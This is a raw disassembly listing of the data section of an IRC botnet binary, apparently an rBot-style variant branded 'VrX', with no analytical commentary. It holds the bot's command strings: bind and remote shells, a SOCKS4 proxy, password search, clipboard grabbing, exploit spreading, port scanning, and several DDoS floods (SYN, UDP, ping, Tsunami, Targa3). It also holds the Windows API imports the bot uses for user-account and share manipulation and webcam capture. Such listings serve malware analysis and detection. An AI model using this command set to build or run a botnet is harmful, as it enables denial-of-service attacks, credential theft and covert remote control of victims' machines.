unk_42C150 db 2Dh ; - ; DATA XREF: sub_401ACD+2265�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_23 db ' Failed to start server thread, error: <%d>.',0
align 4
unk_42C18C db 2Dh ; - ; DATA XREF: sub_401ACD+21FA�o
; sub_40BD91+449�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aServerListen_0 db ' Server listening on IP: %s:%d, Directory: %s\.',0
unk_42C1C8 db 2Dh ; - ; DATA XREF: sub_401ACD+20F3�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_24 db ' Failed to start server thread, error: <%d>.',0
align 4
unk_42C204 db 2Dh ; - ; DATA XREF: sub_401ACD+2084�o
; sub_40BD91+DA�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aServerStarte_1 db ' Server started on Port: %d, File: %s.',0
align 4
unk_42C238 db 2Dh ; - ; DATA XREF: sub_401ACD+1FCF�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aAlreadyRunni_3 db ' Already running.',0
align 4
unk_42C258 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_403A86�o
db 3, 34h, 2
db 4Dh ; M
db 61h, 2 dup(53h)
db 20h
db 53h, 63h, 41h
db 6Eh ; n
db 2, 3, 2Dh
aFailedToSta_25 db ' Failed to start scan, port is invalid.',0
unk_42C290 db 2Dh ; - ; DATA XREF: sub_401ACD+1F6C�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 61h ; a
db 2 dup(6Ch), 2
db 3
aFailedToSta_26 db '- Failed to start scan thread, error: <%d>.',0
align 4
unk_42C2CC db 2Dh ; - ; DATA XREF: sub_401ACD+1EFB�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 61h ; a
db 2 dup(6Ch), 2
db 3
aSPortScanStart db '- %s Port Scan started on %s:%d with a delay of %d seconds for %d'
db ' minutes using %d threads.',0
align 4
aSequential db 'Sequential',0 ; DATA XREF: sub_401ACD+1ED0�o
; sub_401ACD+5B20�o
align 4
aRandom db 'Random',0 ; DATA XREF: sub_401ACD+1EC9�o
; sub_401ACD+5B19�o
align 4
dword_42C34C dd 234032Dh, 3025A56h ; DATA XREF: sub_401ACD+1D0F�o
aAlreadyDScanni db '- Already %d scanning threads. Too many specified.',0
align 4
unk_42C388 db 2Dh ; - ; DATA XREF: sub_401ACD+1CB2�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aFailedToSta_27 db 'Failed to start search thread, error: <%d>.',0
unk_42C3C4 db 2Dh ; - ; DATA XREF: sub_401ACD+1C38�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aSearchingForPa db 'Searching for password.',0
aFp db 'fp',0 ; DATA XREF: sub_401ACD+1BEF�o
align 10h
aFindpass db 'findpass',0 ; DATA XREF: sub_401ACD+1BDE�o
align 4
aNoticeSPhoning db 'NOTICE %s :PHONING HOME: DADI Are You There?! ;).',0Dh,0Ah,0
; DATA XREF: sub_401ACD+1BC8�o
aPhonehome db 'phonehome',0 ; DATA XREF: sub_401ACD+1BB1�o
align 4
aAs db 'as',0 ; DATA XREF: sub_401ACD+1B9C�o
align 10h
aAsc db 'asc',0 ; DATA XREF: sub_401ACD+1B87�o
unk_42C444 db 3 ; DATA XREF: sub_401ACD+1B37�o
a81VrxCrashingB db '8,1-VrX- Crashing bot.',0
aShitycrash db 'shitycrash',0 ; DATA XREF: sub_401ACD+1B21�o
; sub_401ACD+1B71�o
align 4
aTftp db 'tftp',0 ; DATA XREF: sub_401ACD+1B0C�o
align 10h
aTftpserver db 'tftpserver',0 ; DATA XREF: sub_401ACD+1AF7�o
align 4
aHttp db 'http',0 ; DATA XREF: sub_401ACD+1AE2�o
align 4
aHttpserver db 'httpserver',0 ; DATA XREF: sub_401ACD+1ACD�o
align 10h
aRlogin db 'rlogin',0 ; DATA XREF: sub_401ACD+1AB8�o
align 4
aRloginserver db 'rloginserver',0 ; DATA XREF: sub_401ACD+1AA3�o
align 4
aCip db 'cip',0 ; DATA XREF: sub_401ACD+1A8E�o
aCurrentip db 'currentip',0 ; DATA XREF: sub_401ACD+1A79�o
align 4
aFdns db 'fdns',0 ; DATA XREF: sub_401ACD+1A64�o
align 10h
aFlushdns db 'flushdns',0 ; DATA XREF: sub_401ACD+1A4F�o
align 4
aFarp db 'farp',0 ; DATA XREF: sub_401ACD+1A3A�o
align 4
aFlusharp db 'flusharp',0 ; DATA XREF: sub_401ACD+1A25�o
align 10h
aGc db 'gc',0 ; DATA XREF: sub_401ACD+1A10�o
align 4
aGetclip db 'getclip',0 ; DATA XREF: sub_401ACD+19FB�o
unk_42C4EC db 2Dh ; - ; DATA XREF: sub_401ACD+19BD�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSpoofingDisabl db ' Spoofing disabled.',0
aOff db 'off',0 ; DATA XREF: sub_401ACD+19A2�o
; sub_401ACD+3C81�o ...
aSpoof db 'spoof',0 ; DATA XREF: sub_401ACD+198E�o
align 10h
unk_42C520 db 3 ; DATA XREF: sub_401ACD+196E�o
a81VrxLoginList db '8,1-VrX- Login list complete.',0
align 10h
aD_S db '%d. %s',0 ; DATA XREF: sub_401ACD+1939�o
; sub_40B477+46�o
align 4
aEmpty db '<Empty>',0 ; DATA XREF: sub_401ACD:loc_4033F9�o
dword_42C550 dd 234032Dh, 69676F6Ch, 696C206Eh, 3027473h, 2Dh
; DATA XREF: sub_401ACD+1902�o
dword_42C564 dd 6F6877h ; DATA XREF: sub_401ACD+18E5�o
dword_42C568 dd 234032Dh, 2646D63h, 2D03h ; DATA XREF: sub_401ACD+18DA�o
aRemoteShell db 'Remote shell',0 ; DATA XREF: sub_401ACD+18D5�o
align 4
aCmdstop db 'cmdstop',0 ; DATA XREF: sub_401ACD+18BC�o
aOcmd db 'ocmd',0 ; DATA XREF: sub_401ACD+18A7�o
align 4
aOpencmd db 'opencmd',0 ; DATA XREF: sub_401ACD+1892�o
aDll db 'dll',0 ; DATA XREF: sub_401ACD+187D�o
aTestdlls db 'testdlls',0 ; DATA XREF: sub_401ACD+1868�o
align 4
aDrv db 'drv',0 ; DATA XREF: sub_401ACD+1853�o
aDriveinfo db 'driveinfo',0 ; DATA XREF: sub_401ACD+183E�o
align 4
aUp db 'up',0 ; DATA XREF: sub_401ACD+1829�o
align 10h
aUptime db 'uptime',0 ; DATA XREF: sub_401ACD+1814�o
align 4
aPs db 'ps',0 ; DATA XREF: sub_401ACD+17FF�o
align 4
aProcs db 'procs',0 ; DATA XREF: sub_401ACD+17EA�o
align 4
aKosomaky4d db 'KOSOMAKY4D',0 ; DATA XREF: sub_401ACD+17C0�o
; sub_401ACD+17D5�o
align 10h
aSi db 'si',0 ; DATA XREF: sub_401ACD+17AB�o
align 4
aSysinfo db 'sysinfo',0 ; DATA XREF: sub_401ACD+1796�o
aNi db 'ni',0 ; DATA XREF: sub_401ACD+1781�o
align 10h
aNetinfo db 'netinfo',0 ; DATA XREF: sub_401ACD+176C�o
aClg db 'clg',0 ; DATA XREF: sub_401ACD+1757�o
aClearlog db 'clearlog',0 ; DATA XREF: sub_401ACD+1742�o
align 4
aLg db 'lg',0 ; DATA XREF: sub_401ACD+172D�o
align 4
aLog db 'log',0 ; DATA XREF: sub_401ACD+1718�o
aAl db 'al',0 ; DATA XREF: sub_401ACD+1703�o
align 4
aAliases db 'aliases',0 ; DATA XREF: sub_401ACD+16EE�o
aT: ; DATA XREF: sub_401ACD+16D9�o
; .data:00438778�o ...
unicode 0, <t>,0
aThreads db 'threads',0 ; DATA XREF: sub_401ACD+16C4�o
unk_42C628 db 3 ; DATA XREF: sub_401ACD+1690�o
a81VrxFailedToR db '8,1-VrX- Failed to reboot system.',0
align 4
unk_42C64C db 3 ; DATA XREF: sub_401ACD+1689�o
a81VrxRebooting db '8,1-VrX- Rebooting system.',0
aR3start db 'r3start',0 ; DATA XREF: sub_401ACD+1672�o
aI: ; DATA XREF: sub_401ACD+165D�o
; .data:00438784�o ...
unicode 0, <i>,0
aId db 'id',0 ; DATA XREF: sub_401ACD+1648�o
align 4
aS_5: ; DATA XREF: sub_401ACD+1633�o
; .data:00438790�o ...
unicode 0, <s>,0
aStatus db 'status',0 ; DATA XREF: sub_401ACD+161E�o
align 4
aQ: ; DATA XREF: sub_401ACD+1609�o
; .data:off_438768�o ...
unicode 0, <q>,0
aQuit_0 db 'quit',0 ; DATA XREF: sub_401ACD+15F4�o
align 10h
aDc db 'dc',0 ; DATA XREF: sub_401ACD+15DF�o
align 4
aDisconnect db 'disconnect',0 ; DATA XREF: sub_401ACD+15CA�o
align 10h
aR: ; DATA XREF: sub_401ACD+15B5�o
; sub_401ACD+3D8E�o ...
unicode 0, <r>,0
aReconnect db 'reconnect',0 ; DATA XREF: sub_401ACD+15A0�o
align 10h
aExplist db 'explist',0 ; DATA XREF: sub_401ACD+158B�o
aExploitlist db 'exploitlist',0 ; DATA XREF: sub_401ACD+1576�o
aCbstats db 'cbstats',0 ; DATA XREF: sub_401ACD+1561�o
aConnectbacksta db 'connectbackstats',0 ; DATA XREF: sub_401ACD+154C�o
align 10h
aTrstats db 'trstats',0 ; DATA XREF: sub_401ACD+1537�o
aTransferstats db 'transferstats',0 ; DATA XREF: sub_401ACD+1522�o
align 4
aStats db 'stats',0 ; DATA XREF: sub_401ACD+150D�o
align 10h
aScanstats db 'scanstats',0 ; DATA XREF: sub_401ACD+14F8�o
align 4
dword_42C70C dd 312C3803h, 4043532Dh, 2D4Eh ; DATA XREF: sub_401ACD+14ED�o
aScan db 'Scan',0 ; DATA XREF: sub_401ACD+14E8�o
align 10h
aScanstop db 'scanstop',0 ; DATA XREF: sub_401ACD+14CF�o
align 4
dword_42C72C dd 234032Dh, 75636573h, 3026572h, 2Dh ; DATA XREF: sub_401ACD+14C4�o
aSecure_0 db 'Secure',0 ; DATA XREF: sub_401ACD+14BF�o
align 4
aSecurestop db 'securestop',0 ; DATA XREF: sub_401ACD+14A6�o
align 10h
dword_42C750 dd 234032Dh, 6E6F6C63h, 3027365h, 2Dh ; DATA XREF: sub_401ACD+149B�o
aClone db 'Clone',0 ; DATA XREF: sub_401ACD+1496�o
align 4
aClonestop db 'clonestop',0 ; DATA XREF: sub_401ACD+147D�o
align 4
aPsstop db 'psstop',0 ; DATA XREF: sub_401ACD+1468�o
align 4
aProcsstop db 'procsstop',0 ; DATA XREF: sub_401ACD+1453�o
align 4
aFfstop db 'ffstop',0 ; DATA XREF: sub_401ACD+143E�o
align 10h
aFindfilestop db 'findfilestop',0 ; DATA XREF: sub_401ACD+1429�o
align 10h
dword_42C7A0 dd 234032Dh, 70746674h, 2D030264h, 0 ; DATA XREF: sub_401ACD+141E�o
aTftpstop db 'tftpstop',0 ; DATA XREF: sub_401ACD+1400�o
align 4
aPingstop db 'pingstop',0 ; DATA XREF: sub_401ACD+13D7�o
align 4
aUdpstop db 'udpstop',0 ; DATA XREF: sub_401ACD+13AE�o
aWisdomstop db 'wisdomstop',0 ; DATA XREF: sub_401ACD+1385�o
align 4
aTsunamistop db 'tsunamistop',0 ; DATA XREF: sub_401ACD+135C�o
unk_42C7E8 db 2Dh ; - ; DATA XREF: sub_401ACD+1342�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aAllPacketingAc db 'All packeting activity has been halted.',0
dword_42C81C dd 234032Dh, 64736977h, 3026D6Fh, 2Dh ; DATA XREF: sub_401ACD+1307�o
; sub_401ACD+13A3�o
aWisdomAttack db 'Wisdom attack',0 ; DATA XREF: sub_401ACD+1302�o
; sub_401ACD+139E�o
align 4
dword_42C83C dd 234032Dh, 6E757374h, 2696D61h, 2D03h ; DATA XREF: sub_401ACD+12E9�o
; sub_401ACD+137A�o
aTsunamiFlood db 'Tsunami flood',0 ; DATA XREF: sub_401ACD+12E4�o
; sub_401ACD+1375�o
align 4
dword_42C85C dd 234032Dh, 676E6970h, 2D0302h ; DATA XREF: sub_401ACD+1289�o
; sub_401ACD+13F5�o
aPingFlood db 'Ping flood',0 ; DATA XREF: sub_401ACD+1284�o
; sub_401ACD+13F0�o
align 4
dword_42C874 dd 234032Dh, 2706475h, 2D03h ; DATA XREF: sub_401ACD+126B�o
; sub_401ACD+13CC�o
aUdpFlood db 'UDP flood',0 ; DATA XREF: sub_401ACD+1266�o
; sub_401ACD+13C7�o
align 4
aPacketstop db 'packetstop',0 ; DATA XREF: sub_401ACD+1206�o
align 4
dword_42C898 dd 234032Dh, 6B6E6F77h, 2D0302h ; DATA XREF: sub_401ACD+11FB�o
; sub_401ACD+12C8�o
aWonkFlood db 'Wonk flood',0 ; DATA XREF: sub_401ACD+11F6�o
; sub_401ACD+12C3�o
align 10h
aWonkstop db 'wonkstop',0 ; DATA XREF: sub_401ACD+11DD�o
align 4
dword_42C8BC dd 234032Dh, 67726174h, 3023361h, 2Dh ; DATA XREF: sub_401ACD+11D2�o
; sub_401ACD+12AA�o
aTarga3Flood db 'Targa3 flood',0 ; DATA XREF: sub_401ACD+11CD�o
; sub_401ACD+12A5�o
align 4
aTarga3stop db 'targa3stop',0 ; DATA XREF: sub_401ACD+11B4�o
align 4
dword_42C8E8 dd 234032Dh, 73796B73h, 3026E79h, 2Dh ; DATA XREF: sub_401ACD+11A9�o
; sub_401ACD+1328�o
aSkysynFlood db 'SkySyn flood',0 ; DATA XREF: sub_401ACD+11A4�o
; sub_401ACD+1323�o
align 4
aSkysynstop db 'skysynstop',0 ; DATA XREF: sub_401ACD+118B�o
align 4
dword_42C914 dd 234032Dh, 26E7973h, 2D03h ; DATA XREF: sub_401ACD+1180�o
; sub_401ACD+124A�o
aSynFlood db 'Syn flood',0 ; DATA XREF: sub_401ACD+117B�o
; sub_401ACD+1245�o
align 4
aSynstop db 'synstop',0 ; DATA XREF: sub_401ACD+1162�o
dword_42C934 dd 234032Dh, 736F6464h, 2D0302h ; DATA XREF: sub_401ACD+1157�o
; sub_401ACD+122C�o
aDdosFlood db 'DDoS flood',0 ; DATA XREF: sub_401ACD+1152�o
; sub_401ACD+1227�o
align 4
aDdos_stop db 'ddos.stop',0 ; DATA XREF: sub_401ACD+1139�o
align 4
dword_42C958 dd 234032Dh, 69646572h, 74636572h, 2D0302h ; DATA XREF: sub_401ACD+112E�o
aTcpRedirect db 'TCP redirect',0 ; DATA XREF: sub_401ACD+1129�o
align 4
aRedirectstop db 'redirectstop',0 ; DATA XREF: sub_401ACD+1110�o
align 4
dword_42C988 dd 234032Dh, 2676F6Ch, 2D03h ; DATA XREF: sub_401ACD+1105�o
aLogList db 'Log list',0 ; DATA XREF: sub_401ACD+1100�o
align 10h
aLogstop db 'logstop',0 ; DATA XREF: sub_401ACD+10E7�o
dword_42C9A8 dd 234032Dh, 70747468h, 2D030264h, 0 ; DATA XREF: sub_401ACD+10DC�o
aHttpstop db 'httpstop',0 ; DATA XREF: sub_401ACD+10BE�o
align 4
dword_42C9C4 dd 234032Dh, 676F6C72h, 2646E69h, 2D03h ; DATA XREF: sub_401ACD+10B3�o
aRloginstop db 'rloginstop',0 ; DATA XREF: sub_401ACD+1095�o
align 10h
dword_42C9E0 dd 234032Dh, 6B636F73h, 3023473h, 2Dh ; DATA XREF: sub_401ACD+108A�o
aSocks4stop db 'socks4stop',0 ; DATA XREF: sub_401ACD+106C�o
align 4
aS4 db 's4',0 ; DATA XREF: sub_401ACD+1057�o
align 10h
aSocks4 db 'socks4',0 ; DATA XREF: sub_401ACD+1042�o
align 4
dword_42CA08 dd 234032Dh, 646E6962h, 6C656873h, 2D03026Ch, 0
; DATA XREF: sub_401ACD+1037�o
aServer_0 db 'Server',0 ; DATA XREF: sub_401ACD+1032�o
; sub_401ACD+1085�o ...
align 4
aBindshellstop db 'bindshellstop',0 ; DATA XREF: sub_401ACD+1019�o
align 4
aBd db 'bd',0 ; DATA XREF: sub_401ACD+1004�o
align 4
aBindshell db 'bindshell',0 ; DATA XREF: sub_401ACD+FEF�o
align 4
aUnsec db 'unsec',0 ; DATA XREF: sub_401ACD+FDA�o
align 4
aUnsecure db 'unsecure',0 ; DATA XREF: sub_401ACD+FC5�o
align 4
aSec db 'sec',0 ; DATA XREF: sub_401ACD+FB0�o
; sub_401ACD+2D26�o
aSecure db 'secure',0 ; DATA XREF: sub_401ACD+F9B�o
; sub_401ACD+2D15�o
align 4
aSt db 'st',0 ; DATA XREF: sub_401ACD+F86�o
align 4
aSpeedtest db 'speedtest',0 ; DATA XREF: sub_401ACD+F71�o
align 4
aRz db 'rz',0 ; DATA XREF: sub_401ACD+F5C�o
align 4
aRulez db 'rulez',0 ; DATA XREF: sub_401ACD+F47�o
align 10h
aVer db 'ver',0 ; DATA XREF: sub_401ACD+F32�o
aVersion db 'version',0 ; DATA XREF: sub_401ACD+F1D�o
aLo db 'lo',0 ; DATA XREF: sub_401ACD+F08�o
align 10h
aLogout db 'logout',0 ; DATA XREF: sub_401ACD+EF3�o
align 4
aDi3 db 'di3',0 ; DATA XREF: sub_401ACD+EC9�o
; sub_401ACD+EDE�o
aRn db 'rn',0 ; DATA XREF: sub_401ACD+EB4�o
align 10h
aRndnick_0 db 'rndnick',0 ; DATA XREF: sub_401ACD+E9C�o
a63 db '63',0 ; DATA XREF: sub_401ACD+D69�o
align 4
asc_42CAAC: ; DATA XREF: sub_401ACD+D41�o
unicode 0, <)>,0
aChr db '$chr(',0 ; DATA XREF: sub_401ACD+D04�o
align 4
aServer db '$server',0 ; DATA XREF: sub_401ACD+CF9�o
aRndnick db '$rndnick',0 ; DATA XREF: sub_401ACD+CE8�o
align 4
aChan db '$chan',0 ; DATA XREF: sub_401ACD+CCC�o
align 4
aUser db '$user',0 ; DATA XREF: sub_401ACD+CBB�o
align 4
aMe db '$me',0 ; DATA XREF: sub_401ACD+CA9�o
aD_0 db '$%d',0 ; DATA XREF: sub_401ACD+C3B�o
aD db '$%d-',0 ; DATA XREF: sub_401ACD+B77�o
align 4
aK: ; DATA XREF: sub_401ACD+A9F�o
; sub_401ACD+3DBC�o ...
unicode 0, <k>,0
aC: ; DATA XREF: sub_401ACD+A87�o
; sub_401ACD+4AA4�o ...
unicode 0, <c>,0
unk_42CAF4 db 2Dh ; - ; DATA XREF: sub_401ACD+A64�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aChatFailedByUn db '- Chat failed by unauthorized user: %s.',0
align 4
unk_42CB28 db 2Dh ; - ; DATA XREF: sub_401ACD+A53�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aChatAlreadyAct db '- Chat already active with user: %s.',0
align 4
unk_42CB58 db 2Dh ; - ; DATA XREF: sub_401ACD+A42�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToSta_28 db '- Failed to start chat thread, error: <%d>.',0
align 10h
unk_42CB90 db 2Dh ; - ; DATA XREF: sub_401ACD+9D3�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aChatFromUserS_ db '- Chat from user: %s.',0
align 10h
aChat db 'CHAT',0 ; DATA XREF: sub_401ACD+93C�o
align 4
unk_42CBB8 db 2Dh ; - ; DATA XREF: sub_401ACD+91C�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aReceiveFileSFa db '- Receive file: ',27h,'%s',27h,' failed from unauthorized user: %s.',0
align 4
unk_42CBFC db 2Dh ; - ; DATA XREF: sub_401ACD+904�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToSta_29 db '- Failed to start transfer thread, error: <%d>.',0
align 4
dword_42CC38 dd 49544F4Eh, 25204543h, 13A2073h, 474E4950h, 1732520h
; DATA XREF: sub_401ACD+8F3�o
dd 0A0Dh
dword_42CC50 dd 4E495001h, 47h ; DATA XREF: sub_401ACD+8BF�o
dword_42CC58 dd 49544F4Eh, 25204543h, 13A2073h, 53524556h, 204E4F49h
; DATA XREF: sub_401ACD+8B4�o
dd 0D017325h, 0Ah
dword_42CC74 dd 52455601h, 4E4F4953h, 1 ; DATA XREF: sub_401ACD+883�o
dword_42CC80 dd 23h ; DATA XREF: sub_401ACD+7FA�o
; sub_40CD43+1B�o
unk_42CC84 db 2Dh ; - ; DATA XREF: sub_401ACD+769�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aReceiveFileSFr db '- Receive file: ',27h,'%s',27h,' from user: %s.',0
align 4
aS_8 db '%s',0 ; DATA XREF: sub_401ACD+6EA�o
; sub_401ACD+979�o ...
align 4
aSend db 'SEND',0 ; DATA XREF: sub_401ACD+6C3�o
align 10h
dword_42CCC0 dd 43434401h, 0 ; DATA XREF: sub_401ACD+6A5�o
dword_42CCC8 dd 323333h ; DATA XREF: sub_401ACD+62F�o
; sub_401ACD+AC1�o ...
aNotice db 'NOTICE',0 ; DATA XREF: sub_401ACD+60D�o
; sub_409869+F�o
align 4
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_401ACD+601�o
; sub_409869+16�o
unk_42CCDC db 3 ; DATA XREF: sub_401ACD+5B0�o
a81VrxUserSLo_0 db '8,1-VrX- User: %s logged out.',0
align 4
unk_42CCFC db 3 ; DATA XREF: sub_401ACD+590�o
a81VrxJoinedC_0 db '8,1-VrX- Joined channel: %s.',0
align 4
a353 db '353',0 ; DATA XREF: sub_401ACD+55F�o
aQuit db 'QUIT',0 ; DATA XREF: sub_401ACD+522�o
; sub_40F3AA+5C6�o
align 4
aPart db 'PART',0 ; DATA XREF: sub_401ACD+511�o
; sub_401ACD+5CD�o
align 10h
aSS_1 db ':%s%s',0 ; DATA XREF: sub_401ACD+4EC�o
align 4
aNick db 'NICK',0 ; DATA XREF: sub_401ACD+3CE�o
align 10h
aNoticeSS db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+371�o
; sub_401ACD+5F1�o
unk_42CD50 db 3 ; DATA XREF: sub_401ACD+355�o
; sub_401ACD+2E79�o ...
a81VrxUserSLo_1 db '8,1-VrX- User %s logged out.',0
align 10h
aKick db 'KICK',0 ; DATA XREF: sub_401ACD+2E4�o
align 4
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+28D�o
; sub_401ACD+7A88�o ...
align 4
a433 db '433',0 ; DATA XREF: sub_401ACD+262�o
; sub_417B76:loc_417BDE�o
a@: ; DATA XREF: sub_401ACD+23A�o
unicode 0, <@>,0
a302_0 db '302',0 ; DATA XREF: sub_401ACD+22A�o
a005 db '005',0 ; DATA XREF: sub_401ACD+215�o
a001 db '001',0 ; DATA XREF: sub_401ACD+200�o
aJoinSS db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+1E4�o
; sub_401ACD+3BB�o ...
align 4
aPongS db 'PONG %s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+1C3�o
align 4
aPing db 'PING',0 ; DATA XREF: sub_401ACD+1A9�o
; sub_417B76+50�o
align 4
asc_42CDBC: ; DATA XREF: sub_401ACD+19A�o
; sub_401ACD+7B9D�o
unicode 0, <!>,0
asc_42CDC0: ; DATA XREF: sub_401ACD+A8�o
; sub_401ACD+E41�o ...
unicode 0, < >,0
asc_42CDC4 db ' :',0 ; DATA XREF: sub_401ACD+86�o
; sub_401ACD:loc_4025E6�o
align 4
aSSS_1 db '%s %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_409869+5D�o
aCapgetdriverde db 'capGetDriverDescriptionA',0 ; DATA XREF: sub_409909+C7F�o
align 10h
aCapcreatecaptu db 'capCreateCaptureWindowA',0 ; DATA XREF: sub_409909+C77�o
aAvicap32_dll db 'avicap32.dll',0 ; DATA XREF: sub_409909:loc_40A573�o
align 4
aSqldisconnect db 'SQLDisconnect',0 ; DATA XREF: sub_409909+C15�o
align 4
aSqlfreehandle db 'SQLFreeHandle',0 ; DATA XREF: sub_409909+C08�o
align 4
aSqlallochandle db 'SQLAllocHandle',0 ; DATA XREF: sub_409909+BFB�o
align 4
aSqlexecdirect db 'SQLExecDirect',0 ; DATA XREF: sub_409909+BEE�o
align 4
aSqlsetenvattr db 'SQLSetEnvAttr',0 ; DATA XREF: sub_409909+BE1�o
align 4
aSqldriverconne db 'SQLDriverConnect',0 ; DATA XREF: sub_409909+BD9�o
align 4
aOdbc32_dll db 'odbc32.dll',0 ; DATA XREF: sub_409909:loc_40A4D5�o
align 4
aShchangenotify db 'SHChangeNotify',0 ; DATA XREF: sub_409909+B97�o
align 4
aShellexecutea db 'ShellExecuteA',0 ; DATA XREF: sub_409909+B8F�o
align 4
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_409909:loc_40A48B�o
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_409909+B3D�o
align 4
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_409909+B30�o
align 4
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_409909+B23�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_409909+B1B�o
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_409909:loc_40A417�o
aDeleteipnetent db 'DeleteIpNetEntry',0 ; DATA XREF: sub_409909+AD9�o
align 4
aGetipnettable db 'GetIpNetTable',0 ; DATA XREF: sub_409909+AD1�o
align 4
aIphlpapi_dll db 'iphlpapi.dll',0 ; DATA XREF: sub_409909:loc_40A3CD�o
align 4
aDnsflushreso_0 db 'DnsFlushResolverCacheEntry_A',0 ; DATA XREF: sub_409909+A8F�o
align 4
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_409909+A87�o
align 10h
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_409909:loc_40A383�o
align 4
aNetwkstagetinf db 'NetWkstaGetInfo',0 ; DATA XREF: sub_409909+9F9�o
aNetmessagebuff db 'NetMessageBufferSend',0 ; DATA XREF: sub_409909+9EC�o
; sub_418AF1+65�o
align 4
aNetusergetinfo db 'NetUserGetInfo',0 ; DATA XREF: sub_409909+9DF�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_409909+9D2�o
aNetuserdel db 'NetUserDel',0 ; DATA XREF: sub_409909+9C5�o
align 4
aNetuseradd db 'NetUserAdd',0 ; DATA XREF: sub_409909+9B8�o
align 4
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_409909+9AB�o
align 4
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_409909+99E�o
align 4
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_409909+991�o
align 10h
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_409909+984�o
align 10h
aNetsharedel db 'NetShareDel',0 ; DATA XREF: sub_409909+977�o
aNetshareadd db 'NetShareAdd',0 ; DATA XREF: sub_409909+96F�o
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_409909:loc_40A267�o
; sub_418AF1+58�o
align 4
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_409909+921�o
align 4
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_409909+914�o
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_409909+90C�o
align 4
aIcmp_dll db 'icmp.dll',0 ; DATA XREF: sub_409909:loc_40A208�o
align 4
aMozilla4_0Comp db 'Mozilla/4.0 (compatible)',0 ; DATA XREF: sub_409909+8D2�o
align 10h
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_409909+860�o
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_409909+853�o
align 4
aInternetcracku db 'InternetCrackUrlA',0 ; DATA XREF: sub_409909+846�o
align 4
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_409909+839�o
align 10h
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_409909+82C�o
align 10h
aInternetconnec db 'InternetConnectA',0 ; DATA XREF: sub_409909+81F�o
align 4
aHttpsendreques db 'HttpSendRequestA',0 ; DATA XREF: sub_409909+812�o
align 4
aHttpopenreques db 'HttpOpenRequestA',0 ; DATA XREF: sub_409909+805�o
align 4
aInternetgetc_0 db 'InternetGetConnectedStateEx',0 ; DATA XREF: sub_409909+7F8�o
aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: sub_409909+7F0�o
align 4
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_409909:loc_40A0E8�o
aClosesocket db 'closesocket',0 ; DATA XREF: sub_409909+6A6�o
aGetpeername db 'getpeername',0 ; DATA XREF: sub_409909+699�o
aGethostbyaddr db 'gethostbyaddr',0 ; DATA XREF: sub_409909+68C�o
align 4
aGethostbyname db 'gethostbyname',0 ; DATA XREF: sub_409909+67F�o
align 4
aGethostname db 'gethostname',0 ; DATA XREF: sub_409909+672�o
aGetsockname db 'getsockname',0 ; DATA XREF: sub_409909+665�o
aSetsockopt db 'setsockopt',0 ; DATA XREF: sub_409909+658�o
align 4
aAccept db 'accept',0 ; DATA XREF: sub_409909+64B�o
align 4
aListen db 'listen',0 ; DATA XREF: sub_409909+63E�o
align 4
